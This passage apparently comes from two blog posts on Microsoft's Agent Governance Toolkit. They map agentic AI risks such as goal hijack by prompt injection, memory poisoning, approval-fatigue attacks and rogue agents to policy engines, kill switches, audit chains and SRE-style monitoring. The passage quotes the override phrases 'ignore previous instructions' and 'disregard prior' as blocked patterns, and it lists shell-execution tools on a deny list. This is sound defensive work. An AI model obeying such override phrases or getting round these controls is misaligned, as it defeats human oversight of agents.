ASI-09	Human-Agent Trust Exploitation	Agent OS	Approval Workflows + Quorum Logic
ASI-10	Rogue Agents	Agent Runtime	Kill Switch + Ring Isolation + Merkle Audit

ASI-01: Agent Goal Hijack

The risk: Attackers manipulate the agent's objectives via indirect prompt injection or poisoned inputs. The agent believes it is following its original instructions, but it has been redirected.

AGT mitigates this through the Agent OS policy engine. Every agent action passes through a declarative policy evaluation layer before execution. The policy engine supports three modes: strict (deny by default), permissive (allow by default), and audit (log only). Unauthorized goal changes are blocked at the action layer, not at the prompt layer.

from agent_os import StatelessKernel, ExecutionContext kernel = StatelessKernel() ctx = ExecutionContext(agent_id="my-agent", policies=["read_only"]) # This action is blocked by policy -- goal hijack prevented result = await kernel.execute( action="delete_database", params={"target": "production"}, context=ctx, ) # result.success = False, result.error = "Policy violation: read_only"

The MCP Governance Proxy extends this to Model Context Protocol tool calls, evaluating policy before any tool invocation reaches the agent runtime.

ASI-02: Tool Misuse & Exploitation

The risk: An agent's authorized tools are abused in unintended ways, such as exfiltrating data via read operations or chaining benign tools into dangerous workflows.

AGT provides capability-based security inspired by POSIX. Agents receive explicit capability grants (read, write, execute, network), not blanket tool access. The built-in strict mode blocks dangerous tools like run_shell, execute_command, and eval. Tool inputs are sanitized for command injection patterns and shell metacharacters.

The verify_code_safety MCP tool checks generated code before execution, and tool allowlists/denylists give operators fine-grained control over which tools each agent can invoke.

ASI-03: Identity & Privilege Abuse

The risk: Agents escalate privileges by abusing identities or inheriting excessive credentials. Without proper identity, agents operate as ambient authority, and any compromise cascades.

AgentMesh implements zero-trust identity using Decentralized Identifiers (DIDs). Every agent gets a cryptographic identity: did:agentmesh:{agentId}:{fingerprint} backed by Ed25519 key pairs. Trust is earned through a tiered model: Untrusted, Provisional, Trusted, Verified. Trust decays over time without positive signals, and delegation chains must always narrow scope (child capabilities must be a subset of parent capabilities).

from agentmesh import AgentIdentity identity = AgentIdentity.create( name="data-analyst", sponsor="admin@contoso.com", capabilities=["read:data"], # Scoped -- cannot write or delete ) # Delegation MUST narrow, never widen child = identity.delegate( name="chart-helper", capabilities=["read:data:charts"], # Subset of parent )

ASI-04: Agentic Supply Chain Vulnerabilities

The risk: Vulnerabilities in third-party tools, plugins, agent registries, or runtime dependencies that agents use to act, plan, or delegate.

AgentMesh implements the AI-BOM (AI Bill of Materials), a comprehensive standard for tracking the full AI supply chain. This includes model provenance (base model ancestry, fine-tuning history, training cutoff dates), dataset tracking (training data, RAG sources, evaluation benchmarks with data cards including PII status, bias assessment, and consent tracking), weights versioning (SHA-256 hashes, quantization records, LoRA adapter metadata, SLSA build provenance), and software dependencies (SPDX-aligned package tracking with CI security scanning).

# AI-BOM tracks the full supply chain ai_bom = { "modelProvenance": { "primary": {"provider": "anthropic", "model": "claude-3-sonnet"}, "fineTuning": {"method": "LoRA", "evaluationMetrics": {"accuracy": 0.94}}, }, "datasets": [ {"name": "FAQ KB", "type": "fine-tuning", "dataCard": {"piiStatus": "redacted"}}, {"name": "Product Docs", "type": "rag-source", "updateFrequency": "weekly"}, ], "weights": {"hash": "sha256:...", "format": "safetensors", "precision": "bf16"}, }

ASI-05: Unexpected Code Execution

The risk: Agents trigger remote code execution through tools, interpreters, or APIs. Without isolation, a single compromised tool call can escalate to full system access.

Agent Runtime implements CPU ring-inspired execution isolation. Agents run in one of four execution rings: Ring 0 (root/supervisor), Ring 1 (privileged), Ring 2 (standard), and Ring 3 (sandbox/untrusted). Each ring has resource limits and the kill switch provides instant termination of runaway agents.

from hypervisor.models import ( ActionDescriptor, ExecutionRing, ReversibilityLevel, ) from hypervisor.rings.enforcer import RingEnforcer from hypervisor.security.kill_switch import KillSwitch, KillReason # Define agent privilege levels AGENTS = { "supervisor": {"ring": ExecutionRing.RING_0_ROOT, "role": "Orchestrator"}, "data-agent": {"ring": ExecutionRing.RING_1_PRIVILEGED, "role": "Data Engineer"}, "analyst": {"ring": ExecutionRing.RING_2_STANDARD, "role": "Analyst"}, "user-bot": {"ring": ExecutionRing.RING_3_SANDBOX, "role": "User-Facing"}, } # Create a sandboxed action descriptor action = ActionDescriptor( name="run_query", required_ring=ExecutionRing.RING_2_STANDARD, reversibility=ReversibilityLevel.REVERSIBLE, ) # Enforce: sandbox agent cannot run a Ring 2 action enforcer = RingEnforcer() result = enforcer.check(agent_ring=ExecutionRing.RING_3_SANDBOX, action=action) # result.allowed = False -- ring violation prevented # Kill switch for runaway agents kill_switch = KillSwitch() kill_switch.terminate(agent_id="user-bot", reason=KillReason.RING_BREACH)

ASI-06: Memory & Context Poisoning

The risk: Persistent memory or long-running context is poisoned with malicious instructions. An attacker embeds hostile content in a document the agent later retrieves, causing it to follow injected goals.

Agent OS provides a policy-controlled virtual filesystem (VFS) for agent memory. The VFS uses POSIX-style mount points: /mem/working for current context, /mem/episodic for past interactions, /mem/semantic for knowledge, /policy for read-only policy files, and /tools for tool interfaces. Each mount point has enforced permissions (read, write, execute, append). The policy directory is always read-only from user-space, preventing agents from modifying their own governance rules.

from agent_control_plane.vfs import AgentVFS, MemoryBackend, FileMode # Create agent VFS with POSIX-style memory abstraction vfs = AgentVFS(agent_id="data-analyst") # Mount memory backends with explicit permissions vfs.mount("/mem/working", MemoryBackend(), mode=FileMode.READ | FileMode.WRITE) vfs.mount("/mem/semantic", MemoryBackend(), mode=FileMode.READ) # Read-only knowledge vfs.mount("/policy", MemoryBackend(), mode=FileMode.READ) # Policies always read-only # Agent can read working memory data = vfs.read("/mem/working/context.json") # Agent CANNOT write to policy -- enforced at VFS layer # vfs.write("/policy/rules.yaml", content) # Raises PermissionError # Agent CANNOT read semantic memory if not mounted # vfs.read("/mem/procedural/skills") # Raises FileNotFoundError

The CMVK (Cross-Model Verification Kernel) adds a second layer: claims from agent context are verified across multiple AI models to detect poisoned content. Prompt injection patterns like 'ignore previous instructions' and 'disregard prior' are detected and blocked by the MCP proxy sanitizer before reaching the agent.

ASI-07: Insecure Inter-Agent Communication

The risk: Agents collaborate without adequate authentication, confidentiality, or validation. Messages between agents can be intercepted, forged, or replayed.

AgentMesh provides IATP (Inter-Agent Trust Protocol) with E2E encrypted channels using the Signal protocol (X3DH key agreement + Double Ratchet). Every message gets per-message forward secrecy and post-compromise security. The EncryptedTrustBridge requires a successful trust handshake before any encrypted channel can be established, and mutual authentication via Ed25519 challenge-response ensures both parties prove identity at connection time.

from agentmesh.encryption.bridge import EncryptedTrustBridge bridge = EncryptedTrustBridge(agent_did="did:mesh:alice", key_manager=keys) channel = await bridge.open_secure_channel("did:mesh:bob", bob_bundle) ciphertext = channel.send(b"governed action") # E2E encrypted

ASI-08: Cascading Agent Failures

The risk: An initial error or compromise triggers multi-step compound failures across chained agents. One agent's failure propagates through the entire system.

Agent SRE brings production-grade reliability engineering to agent fleets. Circuit breakers automatically isolate failing agents before failures cascade. SLO enforcement with error budgets provides quantified failure tolerance that triggers automatic intervention. Cascading failure detection monitors dependency chains for propagation patterns, and canary deploys enable gradual rollout of agent changes to detect issues early. OpenTelemetry integration provides distributed tracing across multi-agent workflows.

The key insight: treat AI agents like microservices. Apply the same SRE discipline (SLOs, error budgets, circuit breakers, chaos testing) that keeps cloud infrastructure reliable.

ASI-09: Human-Agent Trust Exploitation

The risk: Attackers leverage misplaced user trust in agents' autonomy to authorize dangerous actions. Users rubber-stamp agent requests because they trust the agent, and attackers exploit this approval fatigue.

Agent OS implements approval workflows that require explicit human confirmation for high-risk actions. The system supports configurable risk assessment (critical, high, medium, low), quorum logic for critical actions requiring multiple approvals, and expiration tracking to prevent stale authorizations. The escalation handler includes fatigue detection: if an agent floods reviewers with escalation requests, subsequent requests are auto-denied to prevent the approval-fatigue attack.

from agent_os.integrations.escalation import ( EscalationHandler, InMemoryApprovalQueue, DefaultTimeoutAction, QuorumConfig, ) # Configure approval workflow with fatigue protection handler = EscalationHandler( backend=InMemoryApprovalQueue(), timeout_seconds=300, # 5-minute approval window default_action=DefaultTimeoutAction.DENY, # Deny if no human responds quorum=QuorumConfig(required=2, total=3), # 2-of-3 approvers for critical fatigue_threshold=5, # Auto-deny after 5 rapid requests fatigue_window_seconds=60, # Within a 60-second window ) # Three-outcome model: allow, deny, or escalate # High-risk actions trigger escalation to human reviewers # If the agent triggers too many escalations, fatigue detection kicks in

ASI-10: Rogue Agents

The risk: Agents operating outside their defined scope through configuration drift, reprogramming, or emergent misbehavior. A rogue agent might gradually expand its actions beyond its mandate without any single action triggering a block.

AGT combines runtime behavioral monitoring with instant kill capability. Ring isolation confines rogue agents to their execution ring, preventing privilege escalation. The kill switch provides immediate termination for agents exhibiting rogue behavior (behavioral drift, rate limit violations, ring breaches). Trust score decay tracks agent behavior over time, and the Merkle audit chain provides tamper-evident, cryptographic proof of every agent action.

from agentmesh.governance.audit import AuditEntry, MerkleAuditChain from hypervisor.security.kill_switch import KillSwitch, KillReason # Tamper-evident audit trail chain = MerkleAuditChain() entry = AuditEntry( event_type="tool_call", agent_did="did:agentmesh:data-bot:abc123", action="query_database", outcome="allowed", policy_decision="permit", matched_rule="read_only_policy", ) chain.add_entry(entry) # Auto-computes hash chain # Verify integrity -- any tampering breaks the chain proof = chain.get_proof(entry.entry_id) assert chain.verify_proof(proof) # Cryptographic verification # Kill switch for rogue behavior kill = KillSwitch() kill.terminate( agent_id="data-bot", reason=KillReason.BEHAVIORAL_DRIFT, # Also: RATE_LIMIT, RING_BREACH, MANUAL )

Cross-Cutting Principle: Least Agency

The Least Agency principle is emphasized throughout the OWASP Agentic Top 10 as a foundational design principle. Agents should be granted the minimum capabilities, permissions, and autonomy necessary to complete their assigned tasks.

Layer	Least Agency Mechanism
Agent OS	Policy engine enforces deny-by-default; agents must be explicitly granted each capability
AgentMesh	DID identity with scoped capabilities; delegation requires narrowing (child <= parent)
Agent Runtime	Execution rings (Ring 0-3) enforce privilege tiers; untrusted agents run in Ring 3
Agent SRE	Resource limits and error budgets cap agent impact radius

Performance: Governance Without Latency Tax

A common concern with runtime governance is performance overhead. AGT's benchmarks demonstrate that policy enforcement adds negligible latency:

Metric	Value
Single rule evaluation	84,000 ops/sec
1000 concurrent agents	47,000 ops/sec
Policy evaluation latency	<0.1ms (p99)
Prompt-based violation rate	26.67%
AGT policy violation rate	0.00%
Conformance tests	992
Architecture Decision Records	25

The key takeaway: deterministic policy enforcement is orders of magnitude more reliable than prompt-based guardrails, and it runs fast enough for real-time agent workloads.

Framework Integrations

AGT is framework-agnostic. SDKs are available in Python, TypeScript, .NET, Rust, and Go. Native integrations exist for:

LangChain and LangGraph
CrewAI
AutoGen (Microsoft)
Semantic Kernel (Microsoft)
OpenAI Agents SDK
PydanticAI
Model Context Protocol (MCP)
Agent-to-Agent Protocol (A2A)

Each integration wraps the agent framework's tool-calling and message-passing interfaces with AGT's policy engine, trust scoring, and audit logging. Adding governance to an existing agent takes minutes, not weeks.

Compliance Framework Alignment

Framework	AGT Coverage
OWASP Agentic Top 10 (2026)	All 10 risk categories mapped
NIST AI RMF	Govern, Map, Measure, Manage functions addressed
EU AI Act	Risk classification, audit trails, human oversight
SOC 2 Type II	Audit logging, access controls, change management
CSA ATF	Zero-trust agent architecture alignment
Singapore MGF	Zero-trust, accountability, oversight layers

Getting Started

# Install the complete governance stack pip install agent-governance-toolkit[full] # Or install individual components pip install agent-os-kernel # Policy engine, VFS, approval workflows pip install agentmesh-platform # Identity, trust, encryption, audit pip install agentmesh-runtime # Execution rings, kill switch, saga pip install agent-sre # Circuit breakers, SLOs, chaos testing

The quickstart tutorial walks through adding policy enforcement to an existing LangChain agent in under 10 minutes. Start with a single policy rule and expand as your governance requirements grow.

Contribute and Collaborate

AGT is open source under the MIT license. The project has over 2,000 GitHub stars and contributors from 40+ countries. Whether you are building agent governance for your enterprise, integrating a new framework, or extending the policy engine with OPA/Rego or Cedar policies, we welcome contributions.

Repository: https://github.com/microsoft/agent-governance-toolkit

Documentation: https://microsoft.github.io/agent-governance-toolkit

Discussions: GitHub Discussions on the repository

Disclaimer: This document is provided for informational purposes. Code examples are from the public AGT repository and may evolve. Always refer to the latest repository documentation for current APIs.

Applying Site Reliability Engineering to Autonomous AI Agents

mosiddi — Tue, 19 May 2026 23:12:29 GMT

If you practice SRE, you already have a mental model for running reliable production systems. You define SLOs. You track error budgets. You use circuit breakers to stop cascading failures. You run chaos experiments to find weaknesses before customers do. You treat every operational decision as a tradeoff between reliability and velocity.

That mental model transfers directly to AI agents. It just needs four new ideas.

In the Agent Governance Toolkit: Architecture Deep Dive, Policy Engines, Trust, and SRE for AI Agents, we covered Agent SRE briefly as one of AGT's nine packages: SLOs, error budgets, circuit breakers, chaos engineering, and progressive delivery, adapted from the patterns your SRE team already applies to microservices. Several teams asked for the full story. This is it.

Agent SRE is one of the more novel parts of the toolkit. The policy engine, zero-trust identity, and execution sandboxing have clear analogs in existing security practice. Agent SRE explores newer ground. Established patterns for defining SLOs for AI agent behavior, building chaos experiments for LLM provider failures, or applying error budgets to agent autonomy are still emerging across the industry. We built these capabilities because running agents in production without them is the equivalent of running a fleet of microservices without circuit breakers, health checks, or an on-call runbook.

This post is for SRE teams, platform engineers, and anyone responsible for running AI agents in production. You do not need to be an AI specialist. If you know what a burn rate is, you are ready for this.

The Problem: Agents Fail in Ways Your Existing SRE Tooling Cannot See

When a service fails, your observability stack tells you: latency went up, error rate crossed the SLO threshold, the circuit breaker opened. You page the on-call engineer. They look at traces and find the slow database query.

When an AI agent fails, your observability stack is silent. The agent returned HTTP 200. Latency was normal. Error rate was zero. But the agent quietly approved a transaction it was not authorized to approve, hallucinated a database path and wrote to the wrong table, or got stuck in a reasoning loop that consumed $800 of LLM API budget before anyone noticed.

These are not infrastructure failures. They are behavioral failures.

And they are invisible to monitoring tools built for stateless, deterministic services, because those tools only watch for crashes and timeouts. They do not watch for wrong behavior.

This gap is the problem Agent SRE was designed to solve. The solution borrows everything from the SRE playbook and adds one concept that extends it: the Safety SLI.

The Safety SLI: A New Reliability Dimension

Traditional SLIs measure system behavior from the user's perspective: latency, availability, error rate, throughput. They answer: did the service respond correctly?

For AI agents, correctness is not enough. An agent that responds correctly but acts outside its authorized scope has not succeeded. It has failed in a way that none of your existing SLIs can detect.

The Safety SLI answers a different question: did the agent act within policy?

from agent_sre import SLO, ErrorBudget from agent_sre.slo.indicators import PolicyCompliance # Define a safety SLO: 99% of agent actions must comply with policy safety_slo = SLO( name="safety-compliance", indicators=[ PolicyCompliance( target=0.99, window="7d", ), ], error_budget=ErrorBudget( total=0.01, # 1% budget (1 - 0.99 target) window_seconds=2592000, # 30-day window burn_rate_alert=2.0, # warn at 2x sustainable rate burn_rate_critical=5.0, # page at 5x sustainable rate ), )

When an agent's policy compliance rate drops below 99%, the error budget starts burning. The ErrorBudget tracks consumption automatically and exposes burn rate alerts through its firing_alerts() method. When the budget is exhausted, the configured exhaustion_action determines the system response:

from agent_sre.slo.objectives import ExhaustionAction # Configure what happens when error budget is exhausted safety_slo = SLO( name="safety-compliance", indicators=[PolicyCompliance(target=0.99, window="7d")], error_budget=ErrorBudget( total=0.01, window_seconds=2592000, burn_rate_alert=2.0, # fires at 2x sustainable burn rate burn_rate_critical=5.0, # fires at 5x sustainable burn rate exhaustion_action=ExhaustionAction.CIRCUIT_BREAK, # suspend agent when budget is gone ), ) # In your monitoring loop, check for firing alerts alerts = safety_slo.error_budget.firing_alerts() for alert in alerts: print(f"Alert firing: {alert.name} (severity: {alert.severity})") # Check budget status print(f"Budget remaining: {safety_slo.error_budget.remaining_percent:.1f}%") print(f"Current burn rate: {safety_slo.error_budget.burn_rate():.2f}x") print(f"Exhausted: {safety_slo.error_budget.is_exhausted}")

This is the governance dial from the other direction. The error budget is not just a metric: it is the mechanism that drives agent autonomy decisions. An agent with a clean 30-day safety record earns autonomy. An agent whose budget is burning at 5x the sustainable rate triggers a critical alert, and when the budget is exhausted, the exhaustion_action fires: ALERT, THROTTLE, FREEZE_DEPLOYMENTS, or CIRCUIT_BREAK. The graduated response mirrors what SRE teams already do with service SLOs, applied to agent behavior.

There are multiple SLI dimensions built into Agent SRE. Safety SLIs and Performance SLIs track different aspects of the same agent:

SLI Type	What It Measures	Target Pattern	When Budget Burns
Safety SLI	PolicyCompliance -- fraction of actions within authorized scope	>= 99%	Restrict capabilities, increase human oversight
Performance SLI	TaskSuccessRate, ResponseLatency, CostPerTask	Configurable per workload	Alert, throttle, or circuit-break LLM provider

Additional built-in indicators include ToolCallAccuracy, DelegationChainDepth, HallucinationRate, and CalibrationDeltaSLI. Both SLOs feed into the same error budget dashboard. An agent can have excellent performance but a degrading safety record, or perfect safety compliance and terrible cost efficiency. You need both dimensions to understand whether an agent is production-ready.

Circuit Breakers: Governing Agent Failure Modes That Don't Exist in Microservices

Circuit breakers for services protect against one failure mode: a backend that is slow or unreachable. The pattern is CLOSED -> OPEN -> HALF_OPEN. You know it well.

Agent SRE implements the same state machine for failure modes that are specific to autonomous reasoning systems and do not exist in traditional microservice architectures:

from agent_sre.cascade.circuit_breaker import CircuitBreakerConfig, CircuitBreaker from agent_sre.chaos.engine import FaultType config = CircuitBreakerConfig( failure_threshold=5, # Open after 5 failures in the window recovery_timeout_seconds=60, # Stay OPEN for 60s before HALF_OPEN half_open_max_calls=3, # Allow 3 probes in HALF_OPEN ) breaker = CircuitBreaker(agent_id="analyst-agent-001", config=config) # Failure modes tracked by the circuit breaker: tracked_faults = [ FaultType.POLICY_BYPASS, # Agent exceeds authorized scope FaultType.ERROR_INJECTION, # Upstream model API fails FaultType.TIMEOUT_INJECTION, # Tool calls exceed time budget FaultType.TRUST_PERTURBATION, # Agent trust score falls below threshold FaultType.DEADLOCK_INJECTION, # Agent stuck in iterative reasoning ]

Each failure mode has different circuit-breaking semantics:

Failure Mode	What Triggers It	Circuit-Break Behavior
Policy bypass	Action denied by policy engine	Count toward threshold; log with full context
LLM provider error	HTTP 5xx from model API	Immediately open; route to fallback model if configured
Tool timeout	Tool call exceeds timeout_ms	Count toward threshold; cancel in-flight call
Trust score degradation	Agent trust score drops below configured floor	Open; escalate to Ring 3 (untrusted) until score recovers
Reasoning loop / deadlock	Token or iteration count exceeds budget	Open; trigger human review before resuming

The reasoning loop breaker deserves attention. A microservice cannot get stuck reasoning. An AI agent absolutely can, and when it does, the failure is not an error code: it is an agent that keeps calling tools, consuming tokens, and generating audit events indefinitely. The circuit breaker detects this pattern from the iteration count and token budget and terminates the loop:

# Reasoning loop detection configuration loop_detection_config = { "max_iterations": 15, # Hard stop after 15 reasoning steps "max_tokens_per_session": 50000, # Hard stop on token consumption "repetition_threshold": 0.85, # Stop if >85% of recent actions repeat prior ones "on_detection": "circuit_break_and_escalate", }

The state machine behaves identically to what you know from Hystrix or Resilience4j. What changes is the definition of "failure."

CLOSED (serving) | | failure_threshold crossed for any tracked fault v OPEN (rejecting -- agent action denied, fallback or human-in-loop fires) | | recovery_timeout expires v HALF_OPEN (probe -- limited requests allowed through) | |-- success_threshold met --> CLOSED |-- any failure --> OPEN (reset timeout)

Chaos Engineering for Agents: Fault Injection for Autonomous Systems

The only way to know if your agent system is resilient is to break it intentionally. Traditional chaos engineering targets infrastructure: kill a pod, inject network latency, saturate a disk. Agent chaos engineering targets the failure modes specific to autonomous reasoning systems.

Agent SRE ships fault injection templates that cover the failure modes teams consistently underestimate until they hit production:

from agent_sre.chaos.engine import ChaosExperiment, Fault, FaultType # Experiment 1: LLM provider degrades -- model returns valid responses but with # increased latency and occasional malformed outputs experiment = ChaosExperiment( name="llm-degradation-resilience", target_agent="analyst-agent-001", description="Test agent behavior under degraded LLM provider", faults=[ Fault.latency_injection(target="llm-provider", delay_ms=8000), Fault.error_injection(target="llm-provider", rate=0.05), ], duration_seconds=300, ) # Experiment 2: Trust score manipulation -- simulates an agent receiving # messages from a peer with a spoofed trust score trust_experiment = ChaosExperiment( name="trust-manipulation-resilience", target_agent="orchestrator-001", faults=[ Fault( fault_type=FaultType.TRUST_PERTURBATION, target="did:mesh:orchestrator-001", params={"spoofed_score": 950}, ), ], duration_seconds=120, ) # Experiment 3: Tool timeout cascade -- multiple tools time out simultaneously, # testing whether the agent abandons gracefully or enters a reasoning loop cascade_experiment = ChaosExperiment( name="tool-timeout-cascade", target_agent="analyst-agent-001", faults=[ Fault.timeout_injection(target="database.read", delay_ms=30000), Fault.timeout_injection(target="api.call", delay_ms=30000), ], duration_seconds=180, ) # Run the experiment experiment.start() # ... inject faults during agent execution ... resilience = experiment.calculate_resilience( baseline_success_rate=0.95, experiment_success_rate=0.87, recovery_time_ms=48000, ) experiment.complete(resilience=resilience) print(f"Resilience score: {resilience.overall}/100 -- {'PASSED' if resilience.passed else 'FAILED'}")

Additional fault types built into the chaos engine cover: prompt injection attempts, privilege escalation, data exfiltration attempts, identity spoofing, deadlock injection, and contradictory instruction scenarios. Each maps to a FaultType enum value and can be composed into multi-fault experiments.

Important: The chaos engine records that a fault was injected and triggers the governance response pipeline. Actual infrastructure-level fault injection (network partition, process kill) should be implemented using your existing chaos tooling (Chaos Mesh, Gremlin, Azure Chaos Studio, or similar). Agent SRE governs the agent's behavioral response to faults; it does not own infrastructure manipulation. These two layers are designed to compose.

Each chaos experiment produces a structured resilience score via calculate_resilience(), which compares baseline and experiment success rates. A score of 90+ with passed=True means the agent maintained at least 90% of its baseline performance under fault conditions. Teams use this to set minimum resilience thresholds for production readiness.

Replay Debugging: Reproduce Behavioral Failures Exactly

Infrastructure incidents are reproducible because infrastructure is deterministic. AI agent incidents are hard to reproduce because agent behavior depends on model state, context window content, and the sequence of tool call results, none of which are preserved by default after a session ends.

Agent SRE's replay engine records every agent session as a replayable artifact: the full trace at each step, every tool call with its inputs and outputs, every policy evaluation with its decision, and every trust score at the time of each inter-agent message.

from agent_sre.replay.capture import TraceStore from agent_sre.replay.engine import ReplayEngine, ReplayMode # Traces are captured automatically when SRE tracing is active store = TraceStore( backend="azure_blob", retention_days=30, ) # When an incident occurs, replay the session exactly engine = ReplayEngine(store=store) # Full replay: re-run the session against the same recorded inputs # Uses recorded tool outputs -- no live tool calls -- so replay is deterministic result = await engine.replay( trace_id="trace_2026_05_a7f3b2", mode=ReplayMode.FULL, ) for step in result.steps: print(f"Step {step.index}: {step.action} -> {step.decision}") # Divergence analysis: replay with a policy change applied # Shows exactly which actions would have been blocked under the new policy diff_result = await engine.diff( trace_id="trace_2026_05_a7f3b2", policy_override="policies/stricter-v2.yaml", ) for diff in diff_result.diffs: if diff.description: print(f"Step {diff.span_name}: was {diff.original}, " f"would be {diff.replayed} under new policy")

The divergence analysis is the feature teams use most. When a policy change is proposed, you replay recent production traces against the new policy to see how many actions would have been blocked, which sessions would have failed, and what the error budget impact would have been. Policy changes stop being guesswork.

Progressive Delivery: Safely Rolling Out New Agent Capabilities

When you ship a new service version, you do not send it to all traffic at once. You use canary deployments, feature flags, or traffic splitting. You watch the SLOs. If they degrade, you roll back.

Agent SRE brings the same discipline to agent capability rollout. When you expand an agent's authorized scope, giving it write access it did not have, connecting it to a new tool, or raising its trust floor, you do not expand to the full fleet immediately. You expand progressively, with automated SLO gates controlling each stage.

from agent_sre.delivery.rollout import ( AnalysisCriterion, CanaryRollout, RollbackCondition, RolloutStep, ) rollout = CanaryRollout( name="database-write-capability", steps=[ RolloutStep( name="canary", weight=0.05, # 5% of agents get the new capability duration_seconds=86400, # 24 hours analysis=[ AnalysisCriterion(metric="safety_sli", threshold=0.995), AnalysisCriterion(metric="performance_sli", threshold=0.90), AnalysisCriterion( metric="error_budget_consumed", threshold=0.10, comparator="lte", # canary can burn at most 10% ), ], ), RolloutStep( name="early-adopters", weight=0.25, # 25% traffic duration_seconds=172800, # 48 hours analysis=[ AnalysisCriterion(metric="safety_sli", threshold=0.990), AnalysisCriterion(metric="performance_sli", threshold=0.88), ], ), RolloutStep( name="general-availability", weight=1.0, # 100% traffic duration_seconds=604800, # 1 week of full observation analysis=[ AnalysisCriterion(metric="safety_sli", threshold=0.990), AnalysisCriterion(metric="performance_sli", threshold=0.85), ], ), ], rollback_conditions=[ RollbackCondition(metric="safety_sli", threshold=0.95, comparator="lte"), ], ) # Start the rollout -- SLO gates evaluate at each step rollout.start() # Advance to next step when analysis criteria pass if rollout.advance(): print(f"Advanced to step: {rollout.current_step.name}") print(f"Progress: {rollout.progress_percent:.0f}%")

The SLO gate at each step is the same mechanism as a CI/CD quality gate, but measured on live production behavior rather than test results. An agent capability that degrades the safety SLI during canary does not promote to the next step. If a RollbackCondition fires, the rollout rolls back automatically. This is the mechanism that makes it operationally safe to expand agent autonomy: every expansion is measurable, every measurement gates the next expansion, and rollback is automatic.

Health Checks and Backpressure

Traditional health checks answer: is the service alive? For agents, alive is not enough. A healthy agent is one that is alive, operating within policy, consuming resources within budget, and maintaining a trust score above the Ring threshold it was assigned.

# Agent health check covering multiple dimensions health = await agent_health_check( agent_id="analyst-agent-001", dimensions=[ "liveness", # Is the agent process running? "policy_compliance", # Is safety SLI above threshold? "trust_score", # Is trust score above Ring floor? "resource_budget", # Is token/API spend within limits? "tool_availability", # Are the tools the agent needs reachable? ], ) # health.status: "healthy" | "degraded" | "unhealthy" # health.dimensions: per-dimension pass/fail with values # health.recommended_action: "none" | "restrict" | "suspend" | "terminate"

When health checks report degradation, backpressure controls engage before the circuit breaker opens. Backpressure is the earlier, softer response: accept fewer concurrent tasks, reject low-priority work, drain in-flight tasks gracefully before the situation escalates.

# Backpressure configuration backpressure_config = { "backpressure_threshold": 0.80, # Engage when resource utilization > 80% "max_concurrent": 5, # Hard cap on simultaneous agent tasks "priority_shedding": True, # Drop low-priority tasks first "drain_timeout_seconds": 30, # Allow in-flight tasks to complete }

The ordering matters: backpressure first, then circuit breaker, then suspension. Each stage is recoverable. Each stage preserves more agent state than the next. The SRE principle of graduated response applies to agents exactly as it applies to services.

Observability: Governance Metrics Flow Into Your Existing Stack

Agent SRE does not ask you to adopt a new observability platform. Governance metrics are exported through the same adapters your infrastructure monitoring already uses, including OpenTelemetry, Prometheus, Datadog, and others.

from agent_sre.tracing.exporters import configure_exporters configure_exporters( backends=[ {"type": "prometheus", "endpoint": "http://prometheus:9090"}, {"type": "opentelemetry", "endpoint": "http://otel-collector:4317"}, ], include_metrics=[ "slo.safety_sli", # Per-agent safety compliance rate "slo.error_budget_remaining", # Error budget in percentage "slo.burn_rate", # Current burn rate vs sustainable "circuit_breaker.state", # CLOSED / OPEN / HALF_OPEN "circuit_breaker.failure_count", "trust_score.current", # Agent trust score (0-1000) "trust_score.ring", # Current execution ring "chaos.experiments_run", # Chaos experiment telemetry "health.status", # Aggregate health status "backpressure.load", # Current load vs threshold ], )

Key governance metrics available in your existing dashboards:

Metric	What It Tells You	Alert Condition
slo.safety_sli	Fraction of agent actions within policy	< 0.99
slo.burn_rate	Rate at which error budget is consumed	> 2.0 (warn), > 5.0 (page)
slo.error_budget_remaining	Budget left for the SLO window	< 20%
circuit_breaker.state	Current breaker state per agent	OPEN or HALF_OPEN
trust_score.ring	Execution ring (privilege level)	Ring 3 (untrusted)
health.status	Aggregate health across all dimensions	degraded or unhealthy

If you are already running Grafana dashboards for your services, a governance dashboard for your agent fleet is a new data source and a new set of panels, not a new monitoring stack.

The SRE Mental Model for Agents: Four New Concepts

Everything in Agent SRE is built on the SRE mental model you already have, extended with four concepts that adapt traditional reliability thinking for autonomous systems:

Traditional SRE	Agent SRE Equivalent	What Changes
Latency SLI	Safety SLI	Correctness of action, not speed of response
Error budget	Autonomy budget	Burns on policy violations, not just errors
Circuit breaker	Behavioral circuit breaker	Opens on wrong behavior, not just failure codes
Canary deployment	Capability rollout	Rolls out scope, not just code

The governance insight is that error budgets work in both directions for agents. A service's error budget only decreases. An agent's autonomy is also a budget: it grows when the safety SLI is strong and shrinks when it degrades. The error budget mechanism becomes the operational mechanism for expanding and contracting agent autonomy in response to evidence, which is exactly what regulated industries and risk-averse enterprise teams need before they will trust an autonomous agent with consequential actions.

Getting Started with Agent SRE

pip install agent-sre

A minimal Agent SRE integration requires three things: a safety SLO definition, a circuit breaker, and a health check. The progressive delivery and chaos engineering features layer on top when you are ready for them.

from agent_sre import SLO, ErrorBudget from agent_sre.slo.indicators import TaskSuccessRate from agent_sre.cascade.circuit_breaker import CircuitBreakerConfig, CircuitBreaker # Step 1: Define your safety SLO slo = SLO( name="production-safety", indicators=[TaskSuccessRate(target=0.99, window="24h")], error_budget=ErrorBudget(total=0.01, burn_rate_alert=2.0, burn_rate_critical=5.0), ) # Step 2: Configure a circuit breaker breaker_config = CircuitBreakerConfig( failure_threshold=5, recovery_timeout_seconds=60, half_open_max_calls=3, ) breaker = CircuitBreaker(agent_id="my-agent", config=breaker_config) # Step 3: Wire into your existing agent loop async def governed_agent_loop(agent, task): # Check health first if not await agent_is_healthy(agent.id): return {"error": "agent suspended", "reason": "health check failed"} # Run within circuit breaker protection async with breaker: result = await agent.run(task) slo.record_event(good=result.policy_compliant) return result

The quickstart in the repository walks through a complete setup with safety SLOs, circuit breakers, and a Prometheus dashboard export in under 50 lines.

Why This Matters

Most AI observability tools today focus on what you might call model quality: hallucination rate, latency, token cost, task completion. These are useful metrics. They are not SRE metrics. They do not answer whether the agent acted within its authorized scope, whether its behavioral error budget is burning at a dangerous rate, or whether it would survive the LLM provider going down.

Agent SRE answers those questions using the operational vocabulary that SRE teams already understand: SLOs, error budgets, circuit breakers, chaos experiments, and health checks. The goal is not to replace your observability stack. It is to make agent governance visible inside it.

The reliability of an autonomous agent is not a property of the model. It is a property of the governance infrastructure around it. Agent SRE is that infrastructure.

Resources

GitHub: github.com/microsoft/agent-governance-toolkit
Install: pip install agent-sre
Tutorials: 40+ tutorials including dedicated Agent SRE walkthroughs for SLO setup, chaos experiments, and progressive delivery
Architecture reference: ARCHITECTURE.md
